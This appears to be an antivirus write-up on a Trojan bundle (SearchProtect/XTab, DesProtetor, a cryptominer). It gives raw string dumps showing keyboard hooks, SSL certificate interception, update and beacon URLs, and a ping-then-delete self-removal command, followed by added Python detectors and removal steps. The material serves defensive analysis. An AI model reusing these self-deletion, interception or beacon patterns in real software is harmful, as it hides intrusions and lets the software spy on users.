ironbrowser.exe
comodo.exe
comododragon.exe
crazybrowser.exe
arora.exe
shenzbrowser.exe
enigmabrowser.exe
avant.exe
avantbrowser.exe
orca.exe
xbbrowser.exe
xbrowser.exe
sleipnir.exe
spacetime.exe
3dbrowse.exe
bitty.exe
java.exe
grail.exe
lynx.exe
twb.exe
tt.exe
pinkbrowser.exe
nuke.exe
acoo.exe
palemoon.exe
slimboat.exe
dooble.exe
menubox.exe
chromium.exe
ultrabrowser.exe
zac.exe
kylo.exe
morequick.exe
wyzo.exe
xombrero.exe
qupzilla.exe
cometbird.exe
qtweb.exe
deepnet.exe
xtravo.exe
smartbro.exe
jumpto.exe
weblock4kids.exe
weblock.exe
comodoice.exe
srwareiron.exe
srware.exe
coolnovo.exe
cool.exe
qup.exe
browseme.exe
swiftfox.exe
omniweb.exe
omni.exe
spark.exe
bobrowser.exe
crossbrowser.exe
crossbrowse.exe
content-security-policy-report-only
127.0.0.1
255.0.0.0
ServiceExecute
\P_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
\nj_update.exe
hXXp://VVV.ninjasoftwarellc.com/services/rules.txt?dummy=
hXXp://VVV.ninjasoftwarellc.com/services/update.php?v=
&key=
\P_RuleList.txt
[E] ProductKey :
[N] ProductKey :
cmd.exe /c net start ActSys
cmd.exe /c net stop ActSys
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wsock32.dll
nfapi.dll
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpSetConnectionState
psapi.dll
ProtocolFilters.dll
pfc_setRootSSLCertSubject
KWindows
UrlMon
OnExecute
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation
DesProtetor.exe_4032:
.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
TURLAction
HelpKeywordp
TURLDownloadStatus
dsBeginSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
TDownLoadURL
URLMON.DLL
URLDownloadToFileA
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")JumpID("","%s")TKeyEvent
TKeyPressEvent
HelpKeywordT
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecutepWE
127.0.0.1
255.0.0.0
ServiceExecute
\P_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
\po_update.exe
hXXp://VVV.brsoftwarellc.com/services/rules.txt?dummy=
hXXp://VVV.brsoftwarellc.com/services/update.php?v=
&key=
\P_RuleList.txt
[E] ProductKey :
[N] ProductKey :
cmd.exe /c net start SaveSys
cmd.exe /c net stop SaveSys
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wsock32.dll
nfapi.dll
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpSetConnectionState
psapi.dll
ProtocolFilters.dll
KWindows
UrlMon
OnExecute
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation
ProtectWindowsManager.exe_3736:
.text
`.rdata
@.data
.rsrc
@.reloc
SHELL32.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
SHLWAPI.dll
%dYeArdMoNthdDaY
URLDownloadToFileA
file_url
ShellExecuteExW
SHDeleteKeyW
GetWindowsDirectoryA
GetProcessHeap
GetSystemWindowsDirectoryW
KERNEL32.dll
USER32.dll
RegCreateKeyExW
RegCloseKey
RegOpenKeyExW
RegCreateKeyW
ReportEventW
ADVAPI32.dll
PSAPI.DLL
USERENV.dll
VERSION.dll
GetCPInfo
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
%s_%s
\\.\Phys
..\Src\json\src\json_value.cpp
..\Src\json\src\json_reader.cpp
xxxx
..\Src\json\src\json_writer.cpp
kernel32.dll
mscoree.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
USER32.DLL
portuguese-brazilian
WindowsMangerProtect
SOFTWARE\supWindowsMangerProtect
xa.geoip
visit.heartbeat
ProtectWindowsManager.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
TypesSupported
%s is already installed
%s installed
%s failed to install. Error %d
%s is not installed
Could not remove %s. Error %d
WindowsProtectManger
Advapi32.dll
/c ping 127.0.0.1 -n 2 > nul && del
"%s" %s
psapi.dll
Explorer.exe
urlmon.dll
update.exe
Assertion failed: %s, file %s, line %d
WindowsMangerProtect Service
C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe
WindowsMangerProtect service
SysTool PasSame LIMITED
Windows SysTool Svr
20.0.0.2227
Windows SysTool.exe
HPNotify.exe_3640:
.text
`.rdata
@.data
.rsrc
@.reloc
wszUrl
strUrlTemp
hKEY
strSelUrl
strUrl
strConfUrlTemp
strDsUrl
strHpUrl
strCmdLine
e_GetBrowserCurrentHpUrl
e_GetBrowserCurrentDsUrl
URLDownloadToFileW
URLDownloadToFileW ret:0XX
Error : %d
inflate 1.1.3 Copyright 1995-1998 Mark Adler
1.1.3
monochrome
unsupported bit depth
Run-Time Check Failure #%d - %s
%s%s%p%s%ld%s%d%s
%s%s%s%s
RegOpenKeyExW
RegCloseKey
del /s/q %1\*.*
%suninstall.bat
E:\supsoft\SupSearchProtectV4\SearchProtect\bin\Release\HPNotify.pdb
KERNEL32.dll
GetKeyState
USER32.dll
GDI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteA
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHDeleteKeyW
SHLWAPI.dll
MSVCP110.dll
MSVCR110.dll
_calloc_crt
_CRT_RTC_INITW
__crtGetShowWindowMode
_amsg_exit
_wcmdln
_crt_debugger_hook
__crtUnhandledException
__crtTerminateProcess
__crtSetUnhandledExceptionFilter
GdiplusShutdown
gdiplus.dll
IMM32.dll
DeleteUrlCacheEntryW
WININET.dll
COMCTL32.dll
GetProcessHeap
.?AVCActiveXEnum@DuiLib@@
.?AVCWebBrowserUI@DuiLib@@
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*' />
hXXp://VVV.bing.com/
hXXp://VVV.yahoo.com/
hXXp://VVV.google.com/
%sconf
web/?type=dspp&
web/?type=dspp
hXXp://VVV.v9.com/
Itemd
BrowserAction.dll
%u_%u
%s_%s
%s_X
\\.\PhysicalDrive%d
\\.\Scsi%d:
UrlEdit
conf.xml
hXXp://v9.com/license_agreement.html
hXXp://v9.com/privacy_policy.html
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.show.%s
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.other.%s
%stmp%d.tmp
urlmon.dll
main.xml
explorer.exe
Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__MutexIeWatchDog.dll
BrowerWatchFF.dll
BrowerWatchCH.dll
Global\GUID(6D05BFEC-4307-4649-8963-962A24345DF4)
msimg32.dll
User32.dll
WM_KEYDOWN
WM_KEYUP
WM_SYSKEYDOWN
WM_SYSKEYUP
0xX
keyboard
msftedit.dll
password
%s%s%s
Correct password required
%s\%s
WebBrowser
transshadow
transshadow1
dest='%d,%d,%d,%d'
dest='%d,%d,%d,%d' source='%d,%d,%d,%d'
source='%d,%d,%d,%d' dest='%d,%d,%d,%d'
M-d-d
WebBrowserUI
errorUrl
{D27CDB6E-AE6D-11CF-96B8-444553540000}user32.dll
MSPDB110.DLL
ADVAPI32.DLL
/c ping 127.0.0.1 -n 2 > nul && del /s/q
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
%Program Files% (x86)\XTab\skin\
SupHPNot.exe
4,0,1,2253
SupHPNty.exe
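Both dumped executables embed a manifest with `<requestedExecutionLevel level='requireAdministrator' ...>`, so each launch goes through a UAC prompt and everything they download afterwards runs with full rights. When triaging a batch of such samples it is useful to pull that answer straight out of the file bytes. The block below is an added example in Python, not code from the Lavasoft report or from the SearchProtect binaries; it assumes the manifest is stored as UTF-8 XML (the usual RT_MANIFEST encoding) and uses a constructed byte blob in place of a real PE.

```python
"""Triage check for UAC elevation requests embedded in a PE. Added example,
not code from the report or the SearchProtect binaries."""
import re
import sys
import xml.etree.ElementTree as ET
from typing import List

# RT_MANIFEST resources are stored as plain UTF-8 XML, so a raw byte scan for
# <assembly>...</assembly> finds them without a PE parser (assumption: no
# UTF-16 manifests; a manifest carried as ordinary data would also match).
MANIFEST_RE = re.compile(rb"<assembly\b.*?</assembly>", re.DOTALL)
ELEVATING_LEVELS = {"requireAdministrator", "highestAvailable"}


def manifest_execution_levels(data: bytes) -> List[str]:
    """Return every requestedExecutionLevel/@level found in embedded manifests."""
    levels: List[str] = []
    for match in MANIFEST_RE.finditer(data):
        try:
            root = ET.fromstring(match.group(0))
        except ET.ParseError:
            continue  # truncated hit or not really XML
        for element in root.iter():
            # strip the asm.v2/asm.v3 namespace before comparing the tag
            if element.tag.rsplit("}", 1)[-1] == "requestedExecutionLevel":
                levels.append(element.get("level", ""))
    return levels


def requests_elevation(data: bytes) -> bool:
    """True if any embedded manifest asks UAC for an elevated token."""
    return any(level in ELEVATING_LEVELS for level in manifest_execution_levels(data))


# Constructed stand-in for a PE: header-like bytes, a resource-section marker,
# the manifest text seen in HPNotify.exe / ProtectService.exe, and padding.
SAMPLE_MANIFEST = (
    b"<?xml version='1.0' encoding='UTF-8' standalone='yes'?>"
    b"<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>"
    b"<trustInfo xmlns='urn:schemas-microsoft-com:asm.v3'><security><requestedPrivileges>"
    b"<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />"
    b"</requestedPrivileges></security></trustInfo>"
    b"<dependency><dependentAssembly>"
    b"<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' "
    b"version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' "
    b"language='*' /></dependentAssembly></dependency></assembly>"
)
SAMPLE_PE_BLOB = (b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 200 + b".rsrc"
                  + b"\x00" * 27 + SAMPLE_MANIFEST + b"\x00" * 64)
SAMPLE_ASINVOKER_BLOB = SAMPLE_PE_BLOB.replace(b"requireAdministrator", b"asInvoker")

if __name__ == "__main__":
    # usage: python manifest_check.py <file.exe>; without an argument the
    # constructed blob is scanned
    path = sys.argv[1] if len(sys.argv) > 1 else None
    blob = open(path, "rb").read() if path else SAMPLE_PE_BLOB
    print(manifest_execution_levels(blob), "elevates:", requests_elevation(blob))
```

Treat a hit as a triage signal rather than a verdict: plenty of legitimate installers also request `requireAdministrator`. What makes it notable here is the combination with a throwaway company name and a service that is installed under `C:\ProgramData`.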
ProtectService.exe_3668:
.text
`.rdata
@.data
.rsrc
@.reloc
GET %s%s%s HTTP/1.1
Host: %s
%sUser-Agent: Mozilla/4.0
POST %s HTTP/1.1
%sContent-Type: %s
User-Agent: Mozilla/4.0
Content-Length: %u
%*s %d %*s
%*[ ]%[^
?456789:;<=
!"#$%&'()* ,-./0123
file_url
E:\supsoft\SupSearchProtectV4\SearchProtect\Bin\Release\ProtectService.pdb
GetProcessHeap
GetSystemWindowsDirectoryW
KERNEL32.dll
USER32.dll
RegOpenKeyW
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
SHELL32.dll
MSVCP110.dll
InternetCrackUrlW
WININET.dll
WS2_32.dll
SHLWAPI.dll
MSVCR110.dll
_crt_debugger_hook
__crtUnhandledException
__crtTerminateProcess
_calloc_crt
__crtGetShowWindowMode
_amsg_exit
_wcmdln
__crtSetUnhandledExceptionFilter
WinHttpCloseHandle
WinHttpOpen
WinHttpSetTimeouts
WinHttpCrackUrl
WinHttpConnect
WinHttpOpenRequest
WinHttpSetOption
WinHttpAddRequestHeaders
WinHttpSendRequest
WinHttpGetIEProxyConfigForCurrentUser
WinHttpGetProxyForUrl
WinHttpWriteData
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WINHTTP.dll
SensApi.dll
VERSION.dll
PSAPI.DLL
USERENV.dll
.?AVCHttpClient@@
.?AVCTcpipSocket@@
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
2-2v2
hXXp://
Software\Microsoft\Windows\CurrentVersion\Internet Settings
http=
WinHttpClient
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
hXXp://xa.xingcloud.com
xxxx
%u_%u
%s_%s
%s_X
\\.\PhysicalDrive%d
UpDateProcess.exe
hXXp://VVV.theviilage.com/searchprotect/up?ptid=%s&sid=%s&ln=%s_%s&ver=%s&uid=%s&dp=%s
g{2EFFE99D-743D-44D0-BBF2-F9DDDEA2F92D}Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__MutexReport HeartBeat
cmdshell.exe
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=visit.heartbeat.%s&update0=ref,%s&update1=nation,%s&update2=language,%s&update3=version,%s
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action0=xa.geoip&action1=visit&action2=install
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=uninstall
explorer.exe
Advapi32.dll
"%s" %s
psapi.dll
Explorer.exe
json_value.cpp
ljson_reader.cpp
ProtectSvc.exe
4.0.1.2253
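The two string dumps give a workable indicator set: from HPNotify.exe the `/c ping 127.0.0.1 -n 2 > nul && del ...` self-deletion idiom (and its `del /s/q` variant), and from ProtectService.exe the beacon templates on xa.xingcloud.com and www.theviilage.com together with a hard-coded User-Agent that ends in "in my heart of heart.". The block below is an added example in Python, not code from the report or the binaries, that turns those strings into a process-command-line detector and an HTTP-request classifier and runs both over constructed log records. The sample records, the partner/session values in them, and the reading of the `%s` path segment in the xingcloud template as a partner id are assumptions of this example, not facts from the page; the self-delete pattern is deliberately generalised to cover `timeout`-based and `rd`-based variants of the same idiom.

```python
"""Host and network detectors derived from the HPNotify.exe / ProtectService.exe
string dumps. Added example, not code from the report or the binaries; the log
records below are constructed for illustration."""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# HPNotify.exe strings: "/c ping 127.0.0.1 -n 2 > nul && del" and
# "/c ping 127.0.0.1 -n 2 > nul && del /s/q".  Generalised to the common
# "sleep via loopback ping or timeout, then delete" self-removal idiom.
SELF_DELETE_RE = re.compile(
    r"(?:ping\s+(?:127\.0\.0\.1|localhost|::1)\s+-n\s+\d+|timeout\s+/t\s+\d+)"
    r"[^&]*>\s*nul\s*&&\s*(?:del|erase|rd|rmdir)\b",
    re.IGNORECASE,
)

# ProtectService.exe strings (hXXp://VVV. de-fanged back to http://www.).
BEACON_HOSTS = {"xa.xingcloud.com", "www.theviilage.com"}
BEACON_PATH_PREFIXES = ("/v4/searchprotect/", "/searchprotect/up")
BEACON_UA = ("Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) "
             "in my heart of heart.")


def is_self_delete(cmdline: str) -> bool:
    """True if a process command line uses the ping/timeout-then-delete idiom."""
    return SELF_DELETE_RE.search(cmdline) is not None


def classify_beacon(url: str, user_agent: str = "") -> Optional[Dict]:
    """Match an HTTP request against the SearchProtect telemetry templates.

    Returns None for non-matching traffic, otherwise the host, the partner id
    (assumed to be the %s path segment on xingcloud / the ptid= value on
    theviilage), the action verbs and the query keys, so the analyst can see
    which fields the client reports.
    """
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    path_hit = host in BEACON_HOSTS and parts.path.startswith(BEACON_PATH_PREFIXES)
    ua_hit = user_agent == BEACON_UA
    if not (path_hit or ua_hit):
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    # install: action0=xa.geoip&action1=visit&action2=install
    # heartbeat / uninstall: action=visit.heartbeat.<sid> / action=uninstall
    actions = [query[k][0] for k in sorted(query) if k.startswith("action")]
    if parts.path.startswith("/v4/searchprotect/"):
        partner_id = parts.path.rsplit("/", 1)[-1]
    else:
        partner_id = query.get("ptid", [""])[0]
    return {"host": host, "partner_id": partner_id, "actions": actions,
            "fields": sorted(query), "ua_match": ua_hit}


def scan(process_events: List[Tuple[str, str]],
         http_events: List[Tuple[str, str]]) -> List[str]:
    """Run both detectors and return one finding string per hit."""
    findings = []
    for image, cmdline in process_events:
        if is_self_delete(cmdline):
            findings.append(f"self-delete: {image} {cmdline}")
    for url, ua in http_events:
        hit = classify_beacon(url, ua)
        if hit:
            findings.append(f"beacon: {hit['host']} partner={hit['partner_id']} "
                            f"actions={hit['actions']}")
    return findings


# Constructed sample records: (image, command line) and (url, user-agent).
SAMPLE_PROCESS_EVENTS = [
    ("C:\\Windows\\System32\\cmd.exe",
     '/c ping 127.0.0.1 -n 2 > nul && del /s/q "C:\\Program Files (x86)\\XTab\\skin\\"'),
    ("C:\\Windows\\System32\\cmd.exe",
     "/c timeout /t 3 > nul && rd /s /q C:\\Users\\x\\AppData\\Local\\Temp\\nsh2AB9.tmp"),
    ("C:\\Windows\\System32\\cmd.exe", "/c ping 8.8.8.8 -n 4"),
]
SAMPLE_HTTP_EVENTS = [
    ("http://xa.xingcloud.com/v4/searchprotect/sp2253?action=visit.heartbeat.ab12"
     "&update0=ref,xtab&update1=nation,US&update2=language,en_US&update3=version,4.0.1.2253",
     BEACON_UA),
    ("http://www.theviilage.com/searchprotect/up?ptid=sp2253&sid=ab12&ln=en_US"
     "&ver=4.0.1.2253&uid=WD-WCC1234&dp=0_0", "Mozilla/4.0"),
    ("http://www.bing.com/", "Mozilla/5.0 (Windows NT 6.1) Gecko/20100101 Firefox/31.0"),
]

if __name__ == "__main__":
    for line in scan(SAMPLE_PROCESS_EVENTS, SAMPLE_HTTP_EVENTS):
        print(line)
```

The User-Agent check is kept separate from the host check on purpose: the hosts can change between builds, while the odd UA suffix is compiled into the client and survives a domain rotation, so a proxy rule on the UA alone still catches the beacon.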
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
ProtectService.exe:3580
ProtectService.exe:3668
g3CvT78vSMa0N0LPai7Qvt_mb_1.exe:1884
ProtectWindowsManager.exe:3736
ProtectWindowsManager.exe:3316
import_root_cert.exe:3188
15094FED_stp.EXE:3668
cpuminer-x11opt-setup.exe:3752
DesProtetor.exe:536
wpm_v20.0.0.2227.exe:3268
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_nj.exe:3948
QQBrowser.exe:3824
QQBrowser.exe:3212
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_br.exe:3816
powershell.exe:3772
powershell.exe:3656
powershell.exe:3376
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_am2.exe:3564
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cp.exe:3480
XTab_Setup2253.exe:1748
cmdshell.exe:3596
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_a9.exe:3400
amisid.exe:3516
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe:4024
nfregdrv.exe:3588
nfregdrv.exe:3076
nfregdrv.exe:1648
nfregdrv.exe:3924
nfregdrv.exe:3192
HPNotify.exe:3640
CashReminder.exe:3984
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cr.exe:1520
ActSys.exe:148
certutil.exe:3280
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_ps.exe:3268
amisetup2899__9664.exe:3368
GOSafer.exe:3264
WNet.exe:4016
310714_is.exe:948
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Program Files% (x86)\XTab\msvcp110.dll (536 bytes)
%Program Files% (x86)\XTab\msvcr110.dll (876 bytes)
%Program Files% (x86)\XTab\CmdShell.exe (32 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\mt-core[1].js (42633 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\contabilizar[1].htm (162 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\error[1] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\icone_cadeado[1].gif (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\verificar_ip[1].htm (105 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\error[1] (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp\nsWeb.dll (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\i[1].gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\top-line[1].gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\8Hk4o[1].htm (185 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\SL2[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\carregando[1].gif (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\s9[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\warning[1] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310113f8[1].htm (1006 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\010914i[1].htm (308 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BD.tmp (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\MobiMidia_validation[1].js (865 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\150814c[1].htm (637 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\carregando3[1].gif (1 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\up[1].htm (1 bytes)
C:\ProgramData\WindowsMangerProtect\update\conf (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\certutil.exe (90 bytes)
%Program Files% (x86)\DesProtetor\uninst.exe (1305 bytes)
%Program Files% (x86)\DesProtetor\nfregdrv.exe (1601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh2AB9.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2A2C.tmp (74611 bytes)
%Program Files% (x86)\DesProtetor\ssleay32.dll (12088 bytes)
%Program Files% (x86)\DesProtetor\nfapi.dll (4992 bytes)
%Program Files% (x86)\DesProtetor\desprotetordrv.sys (1856 bytes)
C:\Windows\System32\drivers\desprotetordrv.sys (51 bytes)
%Program Files% (x86)\DesProtetor\libeay32.dll (35507 bytes)
%Program Files% (x86)\DesProtetor\DesProtetor.exe (15982 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh2AB9.tmp\SimpleSC.dll (1921 bytes)
%Program Files% (x86)\DesProtetor\ProtocolFilters.dll (9320 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\CPUFeatures.dll (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\System.dll (23 bytes)
C:\Windows\System32\cpuminer-gw64.exe (41231 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\nsProcess.dll (12 bytes)
